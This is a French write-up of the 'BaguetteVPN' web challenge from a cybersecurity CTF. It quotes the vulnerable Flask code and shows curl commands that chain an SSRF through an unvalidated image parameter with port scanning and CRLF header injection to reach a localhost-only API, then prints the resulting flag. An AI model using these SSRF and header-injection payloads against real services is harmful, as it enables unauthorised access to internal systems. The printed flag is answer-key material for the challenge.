# BaguetteVPN 12/2 - web

**Challenge**

Vous devez maintenant récupérer le secret contenu dans l'API.

http://challenges2.france-cybersecurity-challenge.fr:5002/

Note : une petite énumération de ports (<2000) est autorisée pour ce challenge.

**Solutions**

On est toujours sur le même challenge, et on va examiner le code un peu mieux. On cherche le secret :
```python
@app.route("/api/secret")
def admin():
    if request.remote_addr == '127.0.0.1':
        if request.headers.get('X-API-KEY') == 'b99cc420eb25205168e83190bae48a12':
            return jsonify({"secret": os.getenv('FLAG')})
        return Response('Interdit: mauvaise clé d\'API', status=403)
    return Response('Interdit: mauvaise adresse IP', status=403)
```

Le code est assez transparent : il faut qu'on accède à l'URL `api/secret` avec la clef d'API donnée. Le
souci est que l'API ne nous répondra que si on vient de localhost. C'est le code de la fonction
de chargement des images qui va nous aider.

```python
@app.route("/api/image")
def image():
    filename = request.args.get("fn")
    if filename:
        http = urllib3.PoolManager()
        return http.request('GET', 'http://baguette-vpn-cdn' + filename).data
    else:
        return Response('Paramètre manquant', status=400)
```

L'image est chargée par le réseau, et le paramètre `fn` est utilisé sans validation de sa valeur. On va
donc l'utiliser pour abuser le système. Pour cela, on va saisir comme valeur `@localhost:<port>/api/secret`. La
requête complète sera donc `http://baguette-vpn-cdn@localhost:<port>/api/secret`, ainsi la première partie
de l'URL sera interprétée comme un username, et on injecte le reste de l'URL vers l'API de secret.

On bruteforce gentiment les ports < 5000 comme indiqué, et le port 1337 semble être prometteur :
```shell
$ curl "http://challenges2.france-cybersecurity-challenge.fr:5002/api/image?fn=@localhost:1337/api/secret"
Interdit: mauvaise clé d'API
```

On a le bon port ! On doit maintenant passer la clef, on va utiliser la même technique en ajoutant 
des retour chariots à la fin de l'URL pour pouvoir injecter l'en-tête HTTP :
```shell
$ curl "http://challenges2.france-cybersecurity-challenge.fr:5002/api/image?fn=@localhost:1337/api/secret+HTTP/1.1%0D%0AX-API-KEY:+b99cc420eb25205168e83190bae48a12%0D%0APlop:"
{"secret":"FCSC{6e86560231bae31b04948823e8d56fac5f1704aaeecf72b0c03bfe742d59fdfb}"}
```
